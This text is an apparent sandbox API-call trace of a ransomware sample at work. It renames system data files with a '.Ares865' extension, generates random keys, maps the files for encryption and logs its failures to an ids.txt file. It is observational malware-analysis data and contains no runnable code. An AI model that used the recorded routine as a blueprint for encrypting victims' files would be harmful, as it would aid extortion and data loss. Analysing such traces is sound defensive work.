(lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.ares865"), dwFlags=0x1) returned 1 [0045.165] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0045.165] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1512) returned 1 [0045.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb50 [0045.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.166] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.166] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.166] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.166] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8f0, lpName=0x0) returned 0x12c [0045.168] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f0) returned 0x190000 [0045.169] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.169] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.169] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbc8 [0045.175] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.Ares865") returned 106 [0045.175] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.ares865"), dwFlags=0x1) returned 1 [0045.176] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0045.176] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1334) returned 1 [0045.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba98 [0045.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.176] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.177] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.177] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.177] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x12c [0045.178] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x190000 [0045.179] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.180] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.180] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb10 [0045.180] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.Ares865") returned 103 [0045.180] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.ares865"), dwFlags=0x1) returned 1 [0045.182] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0045.182] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=13427) returned 1 [0045.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba98 [0045.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.182] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.183] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.183] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.183] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3780, lpName=0x0) returned 0x12c [0045.185] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3780) returned 0x190000 [0045.186] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.187] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.187] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb10 [0045.191] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.Ares865") returned 112 [0045.191] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.ares865"), dwFlags=0x1) returned 1 [0045.192] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0045.192] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1334) returned 1 [0045.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba98 [0045.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.192] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.193] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.193] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.193] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x12c [0045.195] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x190000 [0045.196] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.197] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.197] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb10 [0045.206] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.Ares865") returned 108 [0045.206] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.ares865"), dwFlags=0x1) returned 1 [0045.216] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0045.216] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1897) returned 1 [0045.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbae0 [0045.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.216] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.217] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.217] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.217] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa70, lpName=0x0) returned 0x12c [0045.218] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa70) returned 0x190000 [0045.219] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.220] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.220] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb58 [0045.225] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.Ares865") returned 108 [0045.225] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.ares865"), dwFlags=0x1) returned 1 [0045.228] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0045.228] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2913) returned 1 [0045.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0045.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0045.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0045.228] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0045.229] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0045.229] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.229] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe70, lpName=0x0) returned 0x12c [0045.231] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe70) returned 0x190000 [0045.231] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0045.232] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0045.232] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0045.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0045.308] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 83 [0045.308] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.308] GetLastError () returned 0x20 [0045.308] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 105 [0045.308] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 105 [0045.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.308] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff [0045.308] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x69, lpOverlapped=0x0) returned 1 [0045.308] CloseHandle (hObject=0x164) returned 1 [0045.309] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.309] CloseHandle (hObject=0x0) returned 0 [0045.309] CloseHandle (hObject=0x0) returned 0 [0045.309] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.310] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 90 [0045.310] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.310] GetLastError () returned 0x20 [0045.310] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 112 [0045.310] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 112 [0045.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.310] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x568 [0045.310] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x70, lpOverlapped=0x0) returned 1 [0045.310] CloseHandle (hObject=0x164) returned 1 [0045.311] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.311] CloseHandle (hObject=0x0) returned 0 [0045.311] CloseHandle (hObject=0x0) returned 0 [0045.311] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.311] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.311] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2468 [0045.343] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 100 [0045.343] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.344] GetLastError () returned 0x20 [0045.344] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 122 [0045.344] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 122 [0045.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.344] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d8 [0045.344] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x7a, lpOverlapped=0x0) returned 1 [0045.344] CloseHandle (hObject=0x164) returned 1 [0045.345] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.345] CloseHandle (hObject=0x0) returned 0 [0045.345] CloseHandle (hObject=0x0) returned 0 [0045.345] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.346] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 107 [0045.346] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.346] GetLastError () returned 0x20 [0045.346] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All 